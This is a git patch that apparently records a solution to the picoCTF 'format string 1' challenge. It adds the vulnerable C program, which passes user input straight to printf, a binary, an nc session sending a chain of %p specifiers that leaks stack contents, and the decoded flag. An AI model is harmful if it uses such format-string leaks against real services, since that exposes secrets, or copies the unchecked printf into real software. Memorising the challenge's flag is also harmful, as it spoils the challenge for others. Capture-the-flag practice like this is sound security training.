From 9300e7c5f3547fd1dbb2431c37c53713c7dbcd4c Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Tue, 3 Sep 2024 20:24:05 +0200
Subject: [PATCH] pwn/format_string_1

---
 pwn/format_string_1/flag.txt          |   5 +++
 pwn/format_string_1/format-string-1   | Bin 0 -> 16256 bytes
 pwn/format_string_1/format-string-1.c |  44 ++++++++++++++++++++++++++
 pwn/format_string_1/output.txt        |   4 +++
 4 files changed, 53 insertions(+)
 create mode 100644 pwn/format_string_1/flag.txt
 create mode 100755 pwn/format_string_1/format-string-1
 create mode 100644 pwn/format_string_1/format-string-1.c
 create mode 100644 pwn/format_string_1/output.txt

diff --git a/pwn/format_string_1/flag.txt b/pwn/format_string_1/flag.txt
new file mode 100644
index 0000000..c3023f7
--- /dev/null
+++ b/pwn/format_string_1/flag.txt
@@ -0,0 +1,5 @@
+# By cutting off a part of the output and giving it to cyberchef (as well as swapping endianness with word length 8), we get:
+
+0x7b4654436f636970.0x355f31346d316e34.0x3478345f33317937.0x35365f673431665f.0x7d313464303935
+
+-> picoCTF{4n1m41_57y13_4x4_f14g_65590d41}
diff --git a/pwn/format_string_1/format-string-1 b/pwn/format_string_1/format-string-1
new file mode 100755
index 0000000000000000000000000000000000000000..25e6624576ee746cf85367ecb77de7080d62740c
GIT binary patch
literal 16256
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

literal 0
HcmV?d00001

diff --git a/pwn/format_string_1/format-string-1.c b/pwn/format_string_1/format-string-1.c
new file mode 100644
index 0000000..4890517
--- /dev/null
+++ b/pwn/format_string_1/format-string-1.c
@@ -0,0 +1,44 @@
+#include <stdio.h>
+
+
+int main() {
+  char buf[1024];
+  char secret1[64];
+  char flag[64];
+  char secret2[64];
+
+  // Read in first secret menu item
+  FILE *fd = fopen("secret-menu-item-1.txt", "r");
+  if (fd == NULL){
+    printf("'secret-menu-item-1.txt' file not found, aborting.\n");
+    return 1;
+  }
+  fgets(secret1, 64, fd);
+  // Read in the flag
+  fd = fopen("flag.txt", "r");
+  if (fd == NULL){
+    printf("'flag.txt' file not found, aborting.\n");
+    return 1;
+  }
+  fgets(flag, 64, fd);
+  // Read in second secret menu item
+  fd = fopen("secret-menu-item-2.txt", "r");
+  if (fd == NULL){
+    printf("'secret-menu-item-2.txt' file not found, aborting.\n");
+    return 1;
+  }
+  fgets(secret2, 64, fd);
+
+  printf("Give me your order and I'll read it back to you:\n");
+  fflush(stdout);
+  scanf("%1024s", buf);
+  printf("Here's your order: ");
+  printf(buf);
+  printf("\n");
+  fflush(stdout);
+
+  printf("Bye!\n");
+  fflush(stdout);
+
+  return 0;
+}
diff --git a/pwn/format_string_1/output.txt b/pwn/format_string_1/output.txt
new file mode 100644
index 0000000..2041e96
--- /dev/null
+++ b/pwn/format_string_1/output.txt
@@ -0,0 +1,4 @@
+$ nc mimas.picoctf.net 57678 <<<"%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p"
+Give me your order and I'll read it back to you:
+Here's your order: 0x402118.(nil).0x7fbbf8d1fa00.(nil).0x89b880.0xa347834.0x7ffd876bd5a0.0x7fbbf8b10e60.0x7fbbf8d354d0.0x1.0x7ffd876bd670.(nil).(nil).0x7b4654436f636970.0x355f31346d316e34.0x3478345f33317937.0x35365f673431665f.0x7d313464303935
+Bye!